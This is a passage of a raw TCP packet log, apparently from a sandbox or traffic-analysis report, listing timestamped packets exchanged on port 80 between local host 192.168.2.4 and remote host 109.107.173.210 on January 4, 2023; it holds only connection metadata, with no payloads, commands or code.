Jan 4, 2023 16:47:25.421156883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421169043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421205044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421224117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421256065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421263933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421304941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421309948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421350956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421396971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421406031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421446085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421454906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421492100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421500921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421539068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421549082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421586990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421633005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421646118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421680927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421688080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421729088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421737909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421777010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421786070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421823978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421832085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421870947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421876907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421919107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421921968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.421967030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.421972990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422013044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422019005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422111988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422158957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422162056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422179937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422207117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422246933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422256947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422261000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422306061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422311068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422354937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422362089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422401905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422409058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422449112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422481060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422497988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422503948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422544956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422554016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422591925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422597885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422638893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422651052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422703028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422718048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422748089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422780991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422796011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422804117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422843933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422851086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422890902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422894955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422939062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.422940016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.422985077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423002005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423034906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423041105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423096895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423100948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423150063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423196077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423216105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423243999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423253059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423291922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423300982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423340082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423357010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423387051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423413038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423434019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423445940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423481941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423485041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423527956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423537970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423576117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423583984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423625946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423645973 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423674107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423685074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423722029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423731089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423769951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423780918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423816919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423829079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423863888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423871994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423911095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423919916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.423959970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.423973083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424024105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424040079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424042940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424082041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424093008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424101114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424140930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424189091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424202919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424237967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424246073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424285889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424325943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424335003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424341917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424385071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.424391985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.424439907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.444859028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.444926023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.444972992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445019960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445069075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445074081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445074081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445074081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445116997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445148945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445167065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445204973 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445214987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445261002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445307016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445352077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445395947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445398092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445395947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445440054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445467949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445478916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445521116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445549011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445600033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445647001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445693970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445713043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445739985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445785999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445808887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.445832968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445883036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.445946932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.446013927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.450421095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450494051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450542927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450583935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.450588942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450638056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450670004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.450727940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450776100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450822115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450829983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.450869083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450916052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450920105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.450963974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.450975895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451020002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451040983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451083899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451149940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451153994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451195955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451242924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451286077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451292038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451339960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451340914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451385975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451394081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451433897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451469898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451482058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451529026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451566935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451575041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451623917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451663017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451669931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451718092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451776981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451822042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451828003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451868057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451880932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451915026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.451955080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.451962948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452004910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452011108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452060938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452068090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452109098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452135086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452157974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452203989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452215910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452250957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452290058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452296972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452330112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452346087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452392101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452395916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452439070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452441931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452486038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452532053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452534914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452560902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452580929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452627897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452646971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452673912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452719927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452722073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452754021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452768087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452838898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452850103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452896118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452898026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452944994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.452946901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452982903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.452991962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453030109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453038931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453088045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453107119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453135014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453181982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453182936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453222990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453228951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453275919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453289032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453322887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453325033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453372002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453372955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453418016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453424931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453450918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453464985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453500986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453514099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453543901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453561068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453603029 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453607082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453655958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453660011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453687906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453701973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453747988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453747034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453790903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453795910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453840971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453843117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453886986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453891039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453933001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453938961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.453980923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.453985929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454034090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454050064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454078913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454083920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454123974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454130888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454174995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454179049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454221964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454226017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454272985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454274893 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454320908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454324007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454359055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454370975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454416037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454416990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454457045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454476118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454504967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454516888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454545021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454555035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454576015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454592943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454622984 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454629898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454653025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454668045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454719067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454725981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454746008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454771042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454803944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454807997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454838991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454845905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454870939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454884052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.454911947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.454941034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.471951008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472007990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472054005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472094059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.472110033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.472132921 CET	80	49695	109.107.173.210	192.168.2.4
